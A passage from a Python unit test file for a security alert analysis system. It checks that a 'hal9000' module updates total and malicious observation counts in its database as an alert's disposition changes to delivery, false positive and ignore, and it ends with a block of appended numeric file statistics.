        self.assertEqual(tracking_info['id'], test_observable.id)
        self.assertTrue(KEY_TOTAL_COUNT in tracking_info)
        self.assertTrue(KEY_MAL_COUNT in tracking_info)
        # we have not made any changes yet either
        self.assertIsNone(tracking_info[KEY_TOTAL_COUNT])
        self.assertIsNone(tracking_info[KEY_MAL_COUNT])

    @use_db(name='hal9000')
    def test_hal9000_alert_mal_disposition(self, db, c):
        # same as above except we end up alerting and disposition as malicious
        root = create_root_analysis(analysis_mode=ANALYSIS_MODE_ANALYSIS)
        root.initialize_storage()
        test_observable = root.add_observable(F_TEST, 'test')
        root.save()
        root.schedule()

        engine = TestEngine(local_analysis_modes=[ ANALYSIS_MODE_ANALYSIS,
                                                   ANALYSIS_MODE_CORRELATION,
                                                   ANALYSIS_MODE_DISPOSITIONED ])
        engine.set_cleanup(ANALYSIS_MODE_ANALYSIS, False)
        engine.enable_alerting()
        engine.enable_module('analysis_module_forced_detection', ANALYSIS_MODE_ANALYSIS)
        engine.enable_module('analysis_module_hal9000', [ ANALYSIS_MODE_ANALYSIS,
                                                          ANALYSIS_MODE_CORRELATION,
                                                          ANALYSIS_MODE_DISPOSITIONED ])
        engine.controlled_stop()
        engine.start()
        engine.wait()

        # set the disposition for the alert
        set_dispositions([root.uuid], DISPOSITION_DELIVERY, UNITTEST_USER_ID)

        # run the engine again so that is processes the alert in correlation mode with the disposition set
        engine = TestEngine(local_analysis_modes=[ ANALYSIS_MODE_ANALYSIS,
                                                   ANALYSIS_MODE_CORRELATION,
                                                   ANALYSIS_MODE_DISPOSITIONED ])
        engine.enable_alerting()
        engine.enable_module('analysis_module_forced_detection', ANALYSIS_MODE_ANALYSIS)
        engine.enable_module('analysis_module_hal9000', [ ANALYSIS_MODE_ANALYSIS,
                                                          ANALYSIS_MODE_CORRELATION,
                                                          ANALYSIS_MODE_DISPOSITIONED ])
        engine.controlled_stop()
        engine.start()
        engine.wait()

        # storage dir changes when it turns into alert
        root = RootAnalysis(storage_dir=storage_dir_from_uuid(root.uuid))
        root.load()

        # make sure we alerted
        self.assertEqual(root.analysis_mode, ANALYSIS_MODE_DISPOSITIONED)

        test_observable = root.get_observable(test_observable.id)
        self.assertIsNotNone(test_observable)
        analysis = test_observable.get_analysis(HAL9000Analysis)
        self.assertIsNotNone(analysis)

        # these should still both be 0
        self.assertEqual(analysis.total_count, 0)
        self.assertEqual(analysis.mal_count, 0)

        # we should have a single entry in the database for this observable
        hal9000_id = _compute_hal9000_md5(test_observable)

        # with the disposition set we should have the corresponding values
        c.execute("SELECT total_count, mal_count FROM observables WHERE id = UNHEX(%s)", (hal9000_id,))
        result = c.fetchone()
        db.commit()
        self.assertIsNotNone(result)
        self.assertEqual(result[0], 1)
        self.assertEqual(result[1], 1)

        # verify the correct state is kept
        state = root.state['hal9000']
        self.assertTrue(STATE_KEY_ID_TRACKING in state)
        tracking = state[STATE_KEY_ID_TRACKING]
        self.assertTrue(hal9000_id in tracking)
        tracking_info = tracking[hal9000_id]
        self.assertTrue('id' in tracking_info)
        self.assertEqual(tracking_info['id'], test_observable.id)
        self.assertTrue(KEY_TOTAL_COUNT in tracking_info)
        self.assertTrue(KEY_MAL_COUNT in tracking_info)
        # we should be tracking the change we made in here
        self.assertIsNotNone(tracking_info[KEY_TOTAL_COUNT])
        self.assertIsNotNone(tracking_info[KEY_MAL_COUNT])

        # now we change it to FP
        set_dispositions([root.uuid], DISPOSITION_FALSE_POSITIVE, UNITTEST_USER_ID)

        # run the engine again so that is processes the alert in the new correlation mode with the disposition changed
        engine = TestEngine(local_analysis_modes=[ ANALYSIS_MODE_ANALYSIS,
                                                   ANALYSIS_MODE_CORRELATION,
                                                   ANALYSIS_MODE_DISPOSITIONED ])
        engine.enable_alerting()
        engine.enable_module('analysis_module_forced_detection', ANALYSIS_MODE_ANALYSIS)
        engine.enable_module('analysis_module_hal9000', [ ANALYSIS_MODE_ANALYSIS,
                                                          ANALYSIS_MODE_CORRELATION,
                                                          ANALYSIS_MODE_DISPOSITIONED ])
        engine.controlled_stop()
        engine.start()
        engine.wait()

        root = RootAnalysis(storage_dir=storage_dir_from_uuid(root.uuid))
        root.load()

        test_observable = root.get_observable(test_observable.id)
        self.assertIsNotNone(test_observable)
        analysis = test_observable.get_analysis(HAL9000Analysis)
        self.assertIsNotNone(analysis)

        # these should still both be 0
        self.assertEqual(analysis.total_count, 0)
        self.assertEqual(analysis.mal_count, 0)

        # we should have a single entry in the database for this observable
        hal9000_id = _compute_hal9000_md5(test_observable)

        # with the disposition set we should have the corresponding values
        c.execute("SELECT total_count, mal_count FROM observables WHERE id = UNHEX(%s)", (hal9000_id,))
        result = c.fetchone()
        db.commit()
        self.assertIsNotNone(result)
        self.assertEqual(result[0], 1)
        self.assertEqual(result[1], 0) # <-- should be 0 now that it's set to FP

        # verify the correct state is kept
        state = root.state['hal9000']
        self.assertTrue(STATE_KEY_ID_TRACKING in state)
        tracking = state[STATE_KEY_ID_TRACKING]
        self.assertTrue(hal9000_id in tracking)
        tracking_info = tracking[hal9000_id]
        self.assertTrue('id' in tracking_info)
        self.assertEqual(tracking_info['id'], test_observable.id)
        self.assertTrue(KEY_TOTAL_COUNT in tracking_info)
        self.assertTrue(KEY_MAL_COUNT in tracking_info)
        # we should be tracking the change we made in here
        self.assertIsNotNone(tracking_info[KEY_TOTAL_COUNT])
        self.assertIsNone(tracking_info[KEY_MAL_COUNT])

        # finally we change it to ignore, which should entirely remove the counters (set them to 0 anyways)
        set_dispositions([root.uuid], DISPOSITION_IGNORE, UNITTEST_USER_ID)

        # run the engine again so that is processes the alert in the new correlation mode with the disposition changed
        engine = TestEngine(local_analysis_modes=[ ANALYSIS_MODE_ANALYSIS,
                                                   ANALYSIS_MODE_CORRELATION,
                                                   ANALYSIS_MODE_DISPOSITIONED ])
        engine.enable_alerting()
        engine.enable_module('analysis_module_forced_detection', ANALYSIS_MODE_ANALYSIS)
        engine.enable_module('analysis_module_hal9000', [ ANALYSIS_MODE_ANALYSIS,
                                                          ANALYSIS_MODE_CORRELATION,
                                                          ANALYSIS_MODE_DISPOSITIONED ])
        engine.controlled_stop()
        engine.start()
        engine.wait()

        root = RootAnalysis(storage_dir=storage_dir_from_uuid(root.uuid))
        root.load()

        test_observable = root.get_observable(test_observable.id)
        self.assertIsNotNone(test_observable)
        analysis = test_observable.get_analysis(HAL9000Analysis)
        self.assertIsNotNone(analysis)

        # these should still both be 0
        self.assertEqual(analysis.total_count, 0)
        self.assertEqual(analysis.mal_count, 0)

        # we should have a single entry in the database for this observable
        hal9000_id = _compute_hal9000_md5(test_observable)

        # with the disposition set we should have the corresponding values
        c.execute("SELECT total_count, mal_count FROM observables WHERE id = UNHEX(%s)", (hal9000_id,))
        result = c.fetchone()
        db.commit()
        self.assertIsNotNone(result)
        self.assertEqual(result[0], 0) # <-- now both should be set to 0
        self.assertEqual(result[1], 0)

        # verify the correct state is kept
        state = root.state['hal9000']
        self.assertTrue(STATE_KEY_ID_TRACKING in state)
        tracking = state[STATE_KEY_ID_TRACKING]
        self.assertTrue(hal9000_id in tracking)
        tracking_info = tracking[hal9000_id]
        self.assertTrue('id' in tracking_info)
        self.assertEqual(tracking_info['id'], test_observable.id)
        self.assertTrue(KEY_TOTAL_COUNT in tracking_info)
        self.assertTrue(KEY_MAL_COUNT in tracking_info)
        # we should be tracking the change we made in here
        self.assertIsNone(tracking_info[KEY_TOTAL_COUNT])
        self.assertIsNone(tracking_info[KEY_MAL_COUNT])
| 44.25
| 118
| 0.654756
| 1,488
| 13,098
| 5.497312
| 0.110887
| 0.070416
| 0.06846
| 0.034963
| 0.88802
| 0.863936
| 0.863936
| 0.854523
| 0.845966
| 0.832641
| 0
| 0.02232
| 0.274851
| 13,098
| 295
| 119
| 44.4
| 0.838913
| 0.137426
| 0
| 0.839024
| 0
| 0
| 0.061179
| 0.026461
| 0
| 0
| 0
| 0
| 0.317073
| 1
| 0.014634
| false
| 0
| 0.04878
| 0
| 0.068293
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.